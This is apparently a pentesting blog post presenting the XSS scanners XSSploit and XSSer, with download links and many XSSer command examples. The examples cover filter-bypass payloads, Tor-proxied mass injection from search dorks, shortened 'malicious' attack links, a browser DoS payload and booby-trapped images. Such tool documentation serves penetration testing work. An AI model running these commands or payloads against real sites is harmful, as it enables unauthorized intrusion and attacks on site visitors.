Hello there! If you are new here, you might want to subscribe to the RSS feed , Follow us on twitter . You may also subscribe by email .


Share Follow pentesting101 on Twitter

Delivered by FeedBurner

XSSploit


Introduction :

XSSploit is a multi-platform Cross-Site Scripting scanner and exploiter written in Python. It has been developed to help discovery and exploitation of XSS vulnerabilities in penetration testing missions.

When used against a website, XSSploit first crawls the whole website and identifies encountered forms. It then analyses these forms to automatically detect existing XSS vulnerabilities as well as their main characteristics.

The vulnerabilities that have been discovered can then be exploited using the exploit generation engine of XSSploit. This extensible functionality allows choosing the desired exploit behaviour and automatically generates the corresponding HTML link embedding the exploit payload.

A video is available to explain how to use of XSSploit.

Requirements :

The following elements are required by XSSploit:

- Python 2.5
- wxPython GUI toolkit

Download : http://www.scrt.ch/outils/xssploit/Xssploit-0.5.tar.gz

Source : http://www.scrt.ch/pages_en/xssploit.html

[ TOOLS ] : XSSer



XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

Usage

python XSSer.py [-u |-i |-d ] [-p |-g |-c ] [OPTIONS] [Request] [Bypassing] [Techniques]

Examples

* Simple injection from URL:

$ python XSSer.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python XSSer.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with fuzzing, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):

$ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --Fuzz --Hex --verbose -w
-------------------
* Multiple injections from URL, with fuzzing, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

$ python XSSer.py -u "http://host.com" --Fuzz --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:

$ python XSSer.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une

-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python XSSer.py --De "duck" -d "search.php?"

-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):

$ python XSSer.py -c3 --Cw=4 -u "http://host.com"

-------------------
* Simple injection from URL, using POST, with statistics results:

$ python XSSer.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s

-------------------
* Multiple injections from URL to a parameter sending with GET, using Fuzzing, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Fuzz --Doo --short tinyurl

-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Coo --Anchor --Fr="!enter your final injection code here!"

-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"

-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying Fuzzing, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):

$ python XSSer.py -i "list_of_url_targets.txt" --Fuzz --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"

-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.

$ pyton XSSer.py --Imx "test.png" --payload "!enter your malicious injection code here!"

-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.

$ python XSSer.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"

-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca
(federated XSS pentesting botnet)

$ python XSSer.py -d "login.php" --De "duck" --publish

http://xsser.sourceforge.net

Download : 
http://downloads.sourceforge.net/xsser/xsser-1.0b.tar.gz

Source :
http://xsser.sourceforge.net
 
 

WARNING

The tools and informations on this site are provided for legal security research and testing purposes only.
You will be held responsible for your own actions.
have fun and good hunting .

FOLLOW US

Follow pentesting101 on Twitter

Subscribe

Delivered by FeedBurner